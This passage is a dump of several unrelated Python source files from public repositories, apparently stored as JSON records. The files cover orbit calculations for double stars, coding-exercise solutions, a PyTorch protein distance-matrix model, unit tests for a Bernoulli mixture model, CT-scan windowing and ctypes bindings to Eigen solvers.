orb_time[ix] - orb_time_e[ix],\r\n                                                                                        orb_ecc[ix] - orb_ecc_e[ix],\r\n                                                                                        orb_node[ix] - orb_node_e[ix],\r\n                                                                                        w.epoch, max_loops)\r\n\r\n                            w.calc_pos_pa_err_max, 
w.calc_pos_sep_err_max = Position.calc(orb_per[ix] + orb_per_e[ix],\r\n                                                                                        orb_alfa[ix] + orb_alfa_e[ix],\r\n                                                                                        orb_incl[ix] + orb_incl_e[ix],\r\n                                                                                        orb_long[ix] + orb_long_e[ix],\r\n                                                                                        orb_time[ix] + orb_time_e[ix],\r\n                                                                                        orb_ecc[ix] + orb_ecc_e[ix],\r\n                                                                                        orb_node[ix] + orb_node_e[ix],\r\n                                                                                        w.epoch, max_loops)\r\n\r\n                    p0.write(Position.make_line(w, orb_grade[ix]))  # all\r\n                    p0.write('\\n')\r\n                    no_of_with_orbits_write += 1\r\n                    \r\n                    # split into files depending on difference in OBSV-CALC pa & sep\r\n                    if abs(w.diff_pos_pa) <= acc_pa and abs(w.diff_pos_sep) <= acc_sep:\r\n                        p1.write(Position.make_line(w, orb_grade[ix]))  # pa & sep within range\r\n                        p1.write('\\n')\r\n                    elif abs(w.diff_pos_pa) > acc_pa and abs(w.diff_pos_sep) <= acc_sep:\r\n                        p2.write(Position.make_line(w, orb_grade[ix]))  # pa outside range\r\n                        p2.write('\\n')\r\n                    elif abs(w.diff_pos_pa) <= acc_pa and abs(w.diff_pos_sep) > acc_sep:\r\n                        p3.write(Position.make_line(w, orb_grade[ix]))  # sep outside range\r\n                        p3.write('\\n')\r\n                    else:\r\n                        p4.write(Position.make_line(w, orb_grade[ix]))  # pa & sep outside range\r\n                        p4.write('\\n')\r\n                else:\r\n                    no_of_skipped += 1  # may not be calculated\r\n\r\n            except ValueError:  # is supposed to have orbit in 6th but none exists!? id. problem!\r\n                pn.write(Position.make_line(w, 0))\r\n                pn.write('\\n')\r\n                no_of_not_found += 1\r\n\r\n            del w  # delete instance from memory\r\n\r\n    p0.write(Position.make_footer1())\r\n    p0.write('\\n')\r\n    p0.write(Position.make_footer2(no_of_wds_obsv, no_of_with_orbits, no_of_not_found, no_of_with_orbits_write, no_of_skipped))\r\n    p0.write('\\n')\r\n\r\n    pn.close()\r\n    p0.close()\r\n    p1.close()\r\n    p2.close()\r\n    p3.close()\r\n    p4.close()\r\n    f.close()\r\n\r\n    print('No of wds obsv. read    : ', no_of_wds_obsv)\r\n    print('   with orbits           : ', no_of_with_orbits)\r\n    print('   with orbits written   : ', no_of_with_orbits_write)\r\n    print('   rejected (incalculable): ', no_of_skipped)\r\n    print('   not found (wrong id.) : ', no_of_not_found)\r\n\r\n\r\ndef get_orbits():\r\n\r\n    f = open('Input_Files/orb6orbits with pipe.txt', 'r')  # all orbits in 6th cat.\r\n    c = open('Output_Files/calculable orbits.txt', 'w')  # all orbits with high grade orbits and periods in years\r\n    s = open('Output_Files/skipped orbits.txt', 'w')  # orbits rejected\r\n\r\n    no_of_calculable = 0\r\n    no_of_rejected = 0\r\n    no_of_orbits = 0\r\n\r\n    f.readline()  # read header 1\r\n    f.readline()  # read header 2\r\n    for orbit in f:  # read orbital data\r\n        no_of_orbits += 1\r\n        o = Orbit.get(orbit)\r\n        if Orbit.is_calculable(o):  # may set to skip = 1\r\n            no_of_calculable += 1\r\n            c.write(Orbit.make_line(o))\r\n            c.write('\\n')\r\n        else:\r\n            no_of_rejected += 1\r\n            s.write(f'{o.wds} skipped due to grade {o.grade}, period unit {o.per_u}, alfa unit {o.alfa_u}')\r\n            s.write('\\n')\r\n\r\n        Orbit.append_orbit_elt(o)  # store in array regardless of skipped or not\r\n\r\n        del o  # delete instance from memory\r\n\r\n    f.close()\r\n    c.close()\r\n    s.close()\r\n\r\n    print('No of read 6th cat. orbits                 :', no_of_orbits)\r\n    print('   rejected (grade, period- or alfa-unit)  :', no_of_rejected)\r\n    print('   calculable                              :', no_of_calculable)\r\n\r\n    return\r\n\r\n# --------------- \"Mission Control\" --------------\r\nget_orbits()\r\nget_wds_make_files(30000, 0, 0, True)  # max_loops for anomaly, diff in pa, diff. 
in sep, boolean calc_with_errors\r\n# ------------------------------------------------\r\n","repo_name":"MBKastro/astronomical-stuff","sub_path":"OO_DS.py","file_name":"OO_DS.py","file_ext":"py","file_size_in_byte":17671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9986556342","text":"'''Defines stateless utility functions\n'''\nfrom src.core import Atom\n\n\ndef is_intensional(atom: Atom):\n '''Checks if the atom is intensional. If true returns true, otherwise returns false\n\n Arguments:\n atom {Atom} -- Atom to be analyzed\n '''\n for term in atom.terms:\n if not term.isVariable:\n return False\n\n return True\n\n\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n total -= 1\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 *\n (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\nINTENSIONAL_REQUIRED_MESSAGE = 'Atom is not intensional'\n","repo_name":"ai-systems/DILP-Core","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"53"} +{"seq_id":"32346288363","text":"def breakingRecords(scores):\n min, max, minimum, maximum = 0, 0, 0, 0\n for i in range(len(scores)):\n if i==0:\n minimum = scores[i]\n maximum = scores[i]\n continue\n if scores[i] > maximum:\n maximum = scores[i]\n max += 1\n if scores[i] < minimum:\n minimum = scores[i]\n min += 1\n return max, min\n\nscores = [10,5,20,20,4,5,2,25,1]\nprint(breakingRecords(scores))\n","repo_name":"wisehero/thisiscodingtest","sub_path":"python/haker_rank/breaking_the_records.py","file_name":"breaking_the_records.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27928855","text":"n = int(input())\nA = [list(map(int, input().split())) for _ in range(n)]\nB = [list(map(int, input().split())) for _ in range(n)]\n\nans = True\nrotated_A = A\nfor i in range(4):\n for aj, bj in zip(rotated_A, B):\n for ak, bk in zip(aj, bj):\n if ans and ak == 1 and bk != 1:\n ans = False\n break\n rotated_A = list(zip(*rotated_A[::-1]))\n \n if ans:\n print(\"Yes\")\n exit()\n ans = True\nprint(\"No\")\n \n\n ","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"contest/abc/abc298/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392212993","text":"import torch.nn as nn\nfrom .bert import BERT\n\n\nclass InterDM(nn.Module):\n \"\"\"\n BERT Language Model\n Next Sentence Prediction Model + Masked Language Model\n \"\"\"\n\n def __init__(self, vocab_size, hidden=128, n_layers=1, attn_heads=8,\n dm_hidden=16,\n seq_mode='two',\n 
abs_position_embed=True,\n relative_attn=False,\n relative_1d=False,\n max_relative_1d_positions=10,\n relative_3d=False,\n relative_3d_vocab_size=10):\n\n super().__init__()\n self.seq_mode = seq_mode\n\n self.bert = BERT(vocab_size, hidden=hidden, n_layers=n_layers, attn_heads=attn_heads,\n seq_mode=seq_mode,\n abs_position_embed=abs_position_embed,\n relative_attn=relative_attn,\n relative_1d=relative_1d,\n max_relative_1d_positions=max_relative_1d_positions,\n relative_3d=relative_3d,\n relative_3d_vocab_size=relative_3d_vocab_size)\n\n self.dist_mat_pred = DistMatPrediction(hidden, dm_hidden, relative_3d_vocab_size)\n\n def forward(self, x, segment_label=None, distance_matrix=None):\n x = self.bert(x, segment_label, distance_matrix)\n # dist_mat = self._get_dist_mat(x, segment_label)\n dist_mat = self.dist_mat_pred(x)\n return dist_mat\n\n # def _get_dist_mat(self, x, segment_label):\n # \"\"\"\n # use the angular alignment of two vectors as their distance?\n # use (x1-x2) as distance?\n # \"\"\"\n # t1 = segment_label[segment_label == 1].size(0)\n # t2 = segment_label[segment_label == 2].size(0)\n # x1 = x[:, 1:t1-1] # exclude the padded sos_index and eos_index\n # x2 = x[:, t1:t1+t2-1] # exclude the padded eos_index\n # x1 = x1[None, :, :, :]\n # x2 = x2[:, None, :, :]\n # x12 = (x1 * x2).sum(dim=3)\n # dist_mat = x12 #\n # return dist_mat\n\n\nclass DistMatPrediction(nn.Module):\n \"\"\"\n # map the seq vector to distance\n \"\"\"\n def __init__(self, hidden, dm_hidden, relative_3d_vocab_size):\n super().__init__()\n # exclude sos_index, eos_index, pad_index, inter_12 from the vocab\n d_size = relative_3d_vocab_size-4 # number of distance class + no_msa\n self.linear1 = nn.Linear(hidden, dm_hidden)\n self.linear2 = nn.Linear(dm_hidden, d_size)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, x):\n \"\"\"\n :param x: shape (N, S, E)\n :return: dist_mat, shape (N, d_size, S, S)\n \"\"\"\n # t1 = segment_label[segment_label == 1].size(0)\n # t2 = segment_label[segment_label == 2].size(0)\n # x1 = x[:, 1:t1-1] # exclude the padded sos_index and eos_index\n # x2 = x[:, t1:t1+t2-1] # exclude the padded eos_index\n # x1 = x1[:, :, None, :] # shape (N, t1-2, 1, E)\n # x2 = x2[:, None, :, :] # shape (N, 1, t2-1, E)\n\n x = self.linear1(x)\n x1 = x[:, :, None, :] # shape (N, S, 1, E)\n x2 = x[:, None, :, :] # shape (N, 1, S, E)\n\n dist_mat = self.softmax(self.linear2((x1-x2)**2)) # (N, S, S, d_size)\n dist_mat = dist_mat.transpose(1, 3) # (N, d_size, S, S)\n return dist_mat\n\n\nclass NextSentencePrediction(nn.Module):\n \"\"\"\n 2-class classification model : is_next, is_not_next\n \"\"\"\n\n def __init__(self, hidden):\n \"\"\"\n :param hidden: BERT model output size\n \"\"\"\n super().__init__()\n self.linear = nn.Linear(hidden, 2)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, x):\n return self.softmax(self.linear(x[:, 0]))\n\n","repo_name":"lahplover/unippi","sub_path":"model/distmat_model.py","file_name":"distmat_model.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72181331048","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal\n\nfrom bernoullimix.random_initialisation import _adjust_probabilities, _expected_domain, \\\n 
_random_numbers_within_domain, _random_rows_from_dataset, random_mixture_generator\n\nimport pandas as pd\nimport itertools\n\n\n\nclass TestProbabilityAdjustment(unittest.TestCase):\n\n def test_probabilities_are_adjusted_correctly_given_domain(self):\n\n domain = (-5, 5)\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n expected_result = np.array([epsilon,\n 1-epsilon,\n 0.5, ((4.0 - (-5))/10) * (1-2*epsilon) + epsilon])\n\n actual_result = _adjust_probabilities(test_array, epsilon, domain=domain)\n assert_array_almost_equal(expected_result, actual_result)\n\n def test_probabilities_are_adjusted_correctly_given_domain_2d(self):\n domain = (-5, 5)\n epsilon = 0.05\n\n test_array = np.array([[-5.0, 5.0],\n [0.0, 4.0]])\n\n expected_result = np.array([[epsilon, 1 - epsilon],\n [0.5, ((4.0 - (-5)) / 10) * (1 - 2 * epsilon) + epsilon]])\n\n actual_result = _adjust_probabilities(test_array, epsilon, domain=domain)\n assert_array_almost_equal(expected_result, actual_result)\n\n def test_probabilities_out_of_domain_raise_value_error(self):\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n # Low side\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(-4.0, 5.0))\n\n # High side\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(-5.0, 4.0))\n\n def test_ill_specified_domain_raises_value_error(self):\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n # domain[0] > domain[1]\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(5.0, -5.0))\n\n # domain[0] == domain[1]\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(5.0, 5.0))\n\nclass TestDomainCalculation(unittest.TestCase):\n\n def test_domain_is_computed_correctly_when_alpha_is_zero_or_one(self):\n\n domain_a = (0, 1)\n domain_b = (-5, 5)\n\n expected_alpha_zero = domain_b\n expected_alpha_one = domain_a\n\n actual_alpha_zero = _expected_domain(domain_a, domain_b, alpha=0)\n actual_alpha_one = _expected_domain(domain_a, domain_b, alpha=1)\n\n self.assertEqual(expected_alpha_one, actual_alpha_one)\n self.assertEqual(expected_alpha_zero, actual_alpha_zero)\n\n def test_domain_computation_fails_for_bad_alpha(self):\n domain_a = (0, 1)\n domain_b = (-5, 5)\n\n # Negative alpha\n self.assertRaises(ValueError, _expected_domain, domain_a, domain_b,\n alpha=-1)\n # Alpha greater than One\n self.assertRaises(ValueError,\n _expected_domain, domain_a, domain_b,\n alpha=1.1)\n\n def test_domain_stays_the_same_when_both_domains_equal(self):\n domain_a = domain_b = (0, 1)\n\n expected = domain_a\n\n # Regardless of alpha:\n actual_0_1 = _expected_domain(domain_a, domain_b, alpha=0.1)\n actual_0_3 = _expected_domain(domain_a, domain_b, alpha=0.3)\n actual_0_5 = _expected_domain(domain_a, domain_b, alpha=0.5)\n actual_0_7 = _expected_domain(domain_a, domain_b, alpha=0.7)\n\n self.assertEqual(expected, actual_0_1)\n self.assertEqual(expected, actual_0_3)\n self.assertEqual(expected, actual_0_5)\n self.assertEqual(expected, actual_0_7)\n\n def test_domain_computed_correctly_for_different_domains(self):\n domain_a = (-1, 1)\n domain_b = (0, 1)\n\n alpha = 0.75\n\n expected = (domain_a[0] * alpha + domain_b[0] * (1-alpha),\n domain_a[1] * alpha + domain_b[1] * (1 - alpha))\n\n actual = _expected_domain(domain_a, domain_b, alpha)\n\n self.assertEqual(expected, actual)\n\nclass TestRandomNumberGeneration(unittest.TestCase):\n\n def _isin_domain_func(self, domain):\n return 
np.vectorize(lambda x: domain[0] <= x <= domain[1])\n\n def test_random_number_generator_produces_numbers_within_correct_domain(self):\n\n domain_a = (17.0, 130.0)\n domain_b = (-5.0, -4)\n\n random = np.random.RandomState(12345)\n\n numbers_a = _random_numbers_within_domain(random, domain_a, (10,))\n numbers_b = _random_numbers_within_domain(random, domain_b, (10,))\n\n isin_domain_a = self._isin_domain_func(domain_a)\n isin_domain_b = self._isin_domain_func(domain_b)\n\n all_in_a = np.all(isin_domain_a(numbers_a))\n all_in_b = np.all(isin_domain_b(numbers_b))\n\n self.assertTrue(all_in_a, 'Some numbers not in the domain {}:\\n{!r}'.format(domain_a,\n numbers_a))\n\n self.assertTrue(all_in_b, 'Some numbers not in the domain {}:\\n{!r}'.format(domain_b,\n numbers_b))\n\n def test_random_number_generator_samples_numbers_within_whole_domain(self):\n\n linspace = np.linspace(-1, 1, 10)\n complete_domain = linspace[0], linspace[-1]\n\n subdomains = zip(linspace, linspace[1:])\n\n random = np.random.RandomState(12345)\n\n numbers_to_generate = 10000\n\n numbers = _random_numbers_within_domain(random, complete_domain, (numbers_to_generate, ))\n\n for subdomain in subdomains:\n isin_subdomain = self._isin_domain_func(subdomain)\n\n some_in_subdomain = np.any(isin_subdomain(numbers))\n\n self.assertTrue(some_in_subdomain,\n 'Out of {:,} numbers generated for {} '\n 'none in domain {}'.format(numbers_to_generate,\n complete_domain,\n subdomain))\n\n def test_random_rows_returned_replace_missing_data_with_a_random_guess(self):\n\n dataset = pd.DataFrame([[True, None, True]])\n\n random = np.random.RandomState(1207)\n\n expected_answers = {(True, True, True), (True, False, True)}\n\n answers = set()\n for __ in range(100):\n random_rows = _random_rows_from_dataset(dataset, n_rows=1, random=random)\n\n random_rows = tuple(random_rows.iloc[0, :])\n\n answers.add(random_rows)\n\n self.assertSetEqual(expected_answers, answers)\n\nclass TestRandomInitialiserSeeding(unittest.TestCase):\n\n def test_random_initialiser_always_returns_the_same_model_with_the_same_seed(self):\n\n data = pd.DataFrame([[True, False, None, 'dataset-a', 2.5],\n [False, False, None, 'dataset-a', 2.5],\n [False, True, True, 'dataset-a', 2.5]],\n columns=['X1', 'X2', 'X3', 'dataset_id', 'weight'])\n\n seed = 12345\n\n times_to_try = 10\n mixtures_to_generate = 10\n number_of_components = 3\n\n initial_try = list(itertools.islice(random_mixture_generator(number_of_components,\n data,\n random_state=seed),\n mixtures_to_generate))\n\n for attempt in range(1, times_to_try+1):\n current_try = list(itertools.islice(random_mixture_generator(number_of_components,\n data,\n random_state=seed),\n mixtures_to_generate))\n\n self.assertListEqual(initial_try, current_try)","repo_name":"lukauskas/bernoulli-mixture-model","sub_path":"bernoullimix/test/test_random_mixture_generator.py","file_name":"test_random_mixture_generator.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"18199303880","text":"import os\nimport os.path as osp\nimport numpy as np\nfrom tqdm import tqdm\nimport SimpleITK as sitk\nimport numpy as np\nfrom pathlib import Path\nfrom types import SimpleNamespace\nimport sys\nfrom typing import List \nimport cv2\nimport progressbar\n\n\ncfg = {\n \"chest\": {\"lungs\": [{\"W\": 1500, \"L\": -600}], \"mediastinum\": [{\"W\": 350, \"L\": 50}]},\n \"abdomen\": {\"soft tissues\": [{\"W\": 400, \"L\": 50}], \"liver\": [{\"W\": 150, 
\"L\": 30}]},\n \"spine\": {\"soft tissues\": [{\"W\": 250, \"L\": 50}], \"bone\": [{\"W\": 1800, \"L\": 400}]},\n}\n\ndef get_cfg(key, cfg=cfg):\n if isinstance(key, str):\n if \"-\" in key:\n key = key.split(\"-\")\n key = [k.strip() for k in key]\n\n for k in key:\n if k in cfg:\n cfg = cfg[k]\n else:\n raise ValueError(f\"{k} not in cfg\")\n return cfg\n \n if isinstance(key, List):\n res = []\n for c in key:\n res += get_cfg(c, cfg)\n return res\n\ndef load_ct_info(file_path):\n sitk_image = sitk.ReadImage(file_path)\n if sitk_image is None:\n res = {}\n else:\n origin = sitk_image.GetOrigin() # original used list(reversed(, dont know why\n spacing = sitk_image.GetSpacing() # original used list(reversed(, dont know why\n direction = sitk_image.GetDirection()\n subdirection = [direction[8], direction[4], direction[0]]\n res = {\"sitk_image\": sitk_image,\n \"npy_image\": sitk.GetArrayFromImage(sitk_image),\n \"origin\": origin,\n \"spacing\": spacing,\n \"direction\": direction,\n \"subdirection\": subdirection}\n return res\n\ndef change_axes_of_image(npy_image, orientation):\n '''default orientation=[1, -1, -1]'''\n if orientation[0] < 0:\n npy_image = np.flip(npy_image, axis=0)\n if orientation[1] > 0:\n npy_image = np.flip(npy_image, axis=1)\n if orientation[2] > 0:\n npy_image = np.flip(npy_image, axis=2)\n return npy_image\n\ndef convert_2_npy(vol_path):\n image_dict = load_ct_info(vol_path)\n subdirection = image_dict[\"subdirection\"]\n\n image_dict[\"npy_image\"] = change_axes_of_image(\n image_dict[\"npy_image\"], subdirection\n )\n npy_image = image_dict[\"npy_image\"]\n return npy_image\n \ndef windowing(npy_image):\n\n queries = [\n [\"spine-bone\"],\n [\"chest-lungs\", \"chest-mediastinum\"],\n [\"abdomen-soft tissues\", \"abdomen-liver\"],\n ]\n\n stacked = []\n for q in queries:\n c = get_cfg(q)\n\n args = {\n \"name\": '_'.join(q),\n \"window_level\": [x[\"L\"] for x in c],\n \"window_width\": [x[\"W\"] for x in c],\n }\n\n WINDOW_LEVEL = [x[\"L\"] for x in c]\n WINDOW_WIDTH = [x[\"W\"] for x in c]\n\n window_min = None \n window_max = None\n if isinstance(WINDOW_LEVEL, List) and isinstance(WINDOW_WIDTH, List):\n for i, (l, w) in enumerate(zip(WINDOW_LEVEL, WINDOW_WIDTH)):\n window_min = l - (w // 2) if window_min is None else min(window_min, l - (w // 2))\n window_max = l + (w // 2) if window_max is None else max(window_max, l + (w // 2))\n elif isinstance(WINDOW_LEVEL, int) and isinstance(WINDOW_WIDTH, int):\n window_min = WINDOW_LEVEL - (WINDOW_WIDTH // 2)\n window_max = WINDOW_LEVEL + (WINDOW_WIDTH // 2)\n else: \n raise ValueError(\"WINDOW_LEVEL and WINDOW_WIDTH must be int or list of int\")\n\n img = np.clip(npy_image, window_min, window_max)\n img = 255 * ((img - window_min) / (window_max - window_min))\n img = img.astype(np.uint8)\n stacked.append(img)\n \n stacked = np.stack(stacked, axis=-1)\n\n return stacked\n \n\ndef windowing_ct(volume_path, out_dir):\n print(\"Processing test files\")\n test_fileid = osp.basename(volume_path).split(\".nii.gz\")[0] \n npy_image = convert_2_npy(volume_path)\n\n processed = windowing(npy_image)\n\n print(f'Extracting frames from {volume_path} into {out_dir}...')\n bar = progressbar.ProgressBar(max_value=processed.shape[0])\n\n # write to output_dir\n for frame_index, slice in enumerate(processed):\n cv2.imwrite((osp.join(out_dir, f\"{str(frame_index).zfill(4)}.jpg\")), slice)\n bar.update(frame_index)\n 
bar.finish()\n","repo_name":"nhtlongcs/ivos-gui","sub_path":"util/ct_volume/windowing_ct.py","file_name":"windowing_ct.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17821415364","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport time\nimport altair as alt\nimport json\n\n@st.cache\ndef Your_Covid_Data():\n with open('repeated_data.json') as json_f:\n repeated_json = json.load(json_f)\n return alt.Data(values=repeated_json[\"features\"])\n\n@st.cache\ndef Your_World_Data():\n with open('world_data.json') as json_f:\n world_json = json.load(json_f)\n return alt.Data(values=world_json[\"features\"])\n\nst.title(\"How Data-Driven are our Covid fears?\")\n\nexpander = st.beta_expander(\"Instructions\")\nexpander.write(\"This visualization app allows you to view how the public sentiment of fear has changed in 15 countries as a result of the novel Coronavirus. By clicking a country on either of the two graphs below, you can view how the Fear Index varied in comparison to new Covid cases and deaths. \\n\\n By holding shift and pressing multiple countries you can view how Covid fear and Covid statistics vary among different countries. To learn more about Interesting Trends, the Fear Index and Variable Selection, please view the descriptions below. The graphs start at week 11 of the year 2020, which corresponds to the data March 9, 2020.\")\n\nrepeated_data = Your_Covid_Data()\nworld_data = Your_World_Data()\n\n\nmy_selector = alt.selection_multi(fields = [\"properties.location\"],init = [{\"properties.location\": \"United States\"},{\"properties.location\": \"India\"}])\n\nchart = alt.Chart(repeated_data,title = \"Percentage of Elderly and GDP for each Country\").mark_circle().encode(\n x = alt.X(\"properties.gdp_per_capita:Q\", title='GDP per Capita'),\n y=alt.Y(\"properties.aged_65_older:Q\", title='Percentage of Elderly'),\n # color=alt.condition(my_selector, alt.Color(\"properties.Continent:N\",title = \"Continent\"), alt.value('lightgray')),\n color=alt.condition(my_selector, alt.Color(\"properties.location:N\",title = \"Countries\"), alt.value('lightgray')),\n opacity = alt.condition(my_selector, alt.value(1.0), alt.value(0.15)),\n size=alt.Size(\"properties.population:Q\",scale=alt.Scale(domain=(-400000000, 1850000000)), legend=None),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n \n).add_selection(\n my_selector\n).properties(\n width=300,\n height=200\n)\n\n\none_country = alt.Chart(repeated_data).mark_geoshape().encode(\n color= alt.condition(\n # my_selector, alt.Color(\"properties.Continent:N\"), alt.value('gray')\n my_selector, alt.Color(\"properties.location:N\",title = \"Countries\",scale=alt.Scale(scheme='tableau20'),legend = alt.Legend(orient=\"top\",columns=5, labelOpacity=0.8, columnPadding=67,clipHeight=12)), alt.value('gray')\n ),\n opacity = alt.condition(my_selector, alt.value(1.0), alt.value(0.15)),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n).properties(\n width=375,\n height=200\n).add_selection(\n my_selector\n)\n\nworld = alt.Chart(world_data).mark_geoshape().encode(\n color=alt.value('lightgray'),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n).properties( \n width=375,\n height=200\n)\n\n\nboundaries = alt.Chart(world_data, title='World Map').mark_geoshape(\n stroke='white',\n strokeWidth=1,\n fill=None\n)\n\n\nfear = alt.Chart(repeated_data, title='Twitter Fear 
over Time').mark_line().encode(\n    x=alt.X('properties.week:O',title= \"Week\"),\n    y=alt.Y('properties.fear_percentage:Q',title = \"Fear Index\"),\n    color= alt.Color(\"properties.location:N\", legend = alt.Legend())\n    # y=alt.Y('mean(properties.fear_percentage):Q',title = \"Fear Index\"),\n    # color= alt.value(\"gray\")\n).transform_filter(\n    my_selector\n).properties(\n    width = 700,\n    height = 150\n)\n\ncases = alt.Chart(repeated_data, title='Covid Infections over Time').mark_line().encode(\n    x=alt.X('properties.week:O', title = \"Week\"),\n    y=alt.Y('properties.new_cases_per_million:Q',title=\"New Cases per Million\"),\n    color= alt.Color(\"properties.location:N\")\n).transform_filter(\n    my_selector\n).properties(\n    width = 700,\n    height = 150\n)\n\ndeaths = alt.Chart(repeated_data, title='Covid Deaths over Time').mark_line().encode(\n    x=alt.X('properties.week:O', title = \"Week\"),\n    y=alt.Y('properties.new_deaths_per_million:Q',title=\"New Deaths per Million\"),\n    color= alt.Color(\"properties.location:N\")\n).transform_filter(\n    my_selector\n).properties(\n    width = 700,\n    height = 150\n)\n\n\nst.write((chart | world + one_country + boundaries) & fear & cases & deaths)\n\nexpander = st.beta_expander(\"Interesting Trends\")\nexpander.write(\"Have a look at how the Fear Index precedes the number of infections in first world countries. In most of these countries, the fear index halves by the time Covid cases hit their peak. Do we just become bored when the pandemic is most deadly? \\n\\nNotice how the death rate is very low in UAE compared to Ireland; perhaps the lower percentage of elderly could explain this. \\n\\n Have a look at Covid infections and deaths in third world countries. Could a lack of testing explain the low cases and deaths even when fear is high? \\n\\n Maybe look at how similar the fear and Covid trends are within countries of the same continent; maybe shared cultural and geographical aspects could be the reason?\")\n\nexpander = st.beta_expander(\"What is the Fear Index\")\nexpander.write(\"The Fear Index is the percentage of Covid-related tweets that contain keywords related to fear. These keywords include conjugations of synonyms of 'fear' such as 'scared', 'afraid' and 'nervous'. \\n\\n To collect the Tweets, we utilize the publicly available Harvard 'Coronavirus Tweet Ids' dataset.\")\n\nexpander = st.beta_expander(\"Variable Selection\")\nexpander.write(\"The variables GDP per Capita and percentage of population above 65 were chosen because our intuition would tell us that our Covid fears should increase as these variables increase. 
This is because Covid is more dangerous when hospital beds cannot be afforded or when it affects a member of the elderly.\")\n","repo_name":"CMU-IDS-2020/a3-b-c","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5990416082","text":"from ctypes import CDLL, c_int, c_double, POINTER\nimport numpy as np\nfrom config import get_library_path\n\nlibrary = CDLL(get_library_path(\"eigen\"))\n\nc_int_p = POINTER(c_int)\nc_double_p = POINTER(c_double)\n\n_solve_eigen_icholt_coo = library.solve_eigen_icholt_coo\n_solve_eigen_icholt_coo.restype = c_int\n_solve_eigen_icholt_coo.argtypes = [\n c_double_p,\n c_int_p,\n c_int_p,\n c_int,\n c_double_p,\n c_double_p,\n c_int,\n c_double,\n c_double,\n]\n\n_solve_eigen_cholesky_coo = library.solve_eigen_cholesky_coo\n_solve_eigen_cholesky_coo.restype = c_int\n_solve_eigen_cholesky_coo.argtypes = [\n c_double_p,\n c_int_p,\n c_int_p,\n c_int,\n c_double_p,\n c_double_p,\n c_int,\n]\n\n\ndef solve_eigen_icholt_coo(\n coo_data,\n row,\n col,\n b,\n rtol=1e-10,\n initial_shift=0.01,\n):\n assert coo_data.flags[\"C_CONTIGUOUS\"]\n assert row.flags[\"C_CONTIGUOUS\"]\n assert col.flags[\"C_CONTIGUOUS\"]\n assert b.flags[\"C_CONTIGUOUS\"]\n assert coo_data.dtype == np.float64\n assert b.dtype == np.float64\n assert row.dtype == np.int32\n assert col.dtype == np.int32\n assert coo_data.shape[0] == row.shape[0]\n assert coo_data.shape[0] == col.shape[0]\n\n n = b.shape[0]\n nnz = coo_data.shape[0]\n\n x = np.empty(n)\n\n err = _solve_eigen_icholt_coo(\n np.ctypeslib.as_ctypes(coo_data),\n np.ctypeslib.as_ctypes(row.ravel()),\n np.ctypeslib.as_ctypes(col.ravel()),\n nnz,\n np.ctypeslib.as_ctypes(b),\n np.ctypeslib.as_ctypes(x),\n n,\n rtol,\n initial_shift,\n )\n\n if err:\n raise ValueError(\"Linear system could not be solved\")\n\n return x\n\n\ndef solve_eigen_cholesky_coo(coo_data, row, col, b):\n assert coo_data.flags[\"C_CONTIGUOUS\"]\n assert row.flags[\"C_CONTIGUOUS\"]\n assert col.flags[\"C_CONTIGUOUS\"]\n assert b.flags[\"C_CONTIGUOUS\"]\n assert coo_data.dtype == np.float64\n assert b.dtype == np.float64\n assert row.dtype == np.int32\n assert col.dtype == np.int32\n assert coo_data.shape[0] == row.shape[0]\n assert coo_data.shape[0] == col.shape[0]\n\n n = b.shape[0]\n nnz = coo_data.shape[0]\n\n x = np.empty(n)\n\n err = _solve_eigen_cholesky_coo(\n np.ctypeslib.as_ctypes(coo_data),\n 